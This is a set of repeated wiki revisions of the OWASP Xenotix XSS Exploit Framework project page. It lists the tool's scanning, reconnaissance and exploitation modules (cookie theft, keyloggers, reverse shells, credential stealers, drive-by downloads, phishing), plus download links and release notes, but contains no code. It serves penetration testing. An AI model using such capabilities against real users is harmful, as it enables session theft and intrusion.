* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:ToolsWatch2013.png

2015-01-20T08:25:12Z

Ajin Abraham:

OWASP Xenotix XSS Exploit Framework

2015-01-15T05:05:30Z

Ajin Abraham: /* Downloads */

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

* Xenotix is now available for Android Devices. [Download | http://m.xenotix.in]
====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>

= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:ToolsWatch2014.png

2015-01-15T05:03:32Z

Ajin Abraham:

OWASP Xenotix XSS Exploit Framework

2015-01-15T05:02:40Z

Ajin Abraham: /* AWARDS */

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2015-01-15T05:00:41Z

Ajin Abraham: awards added

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

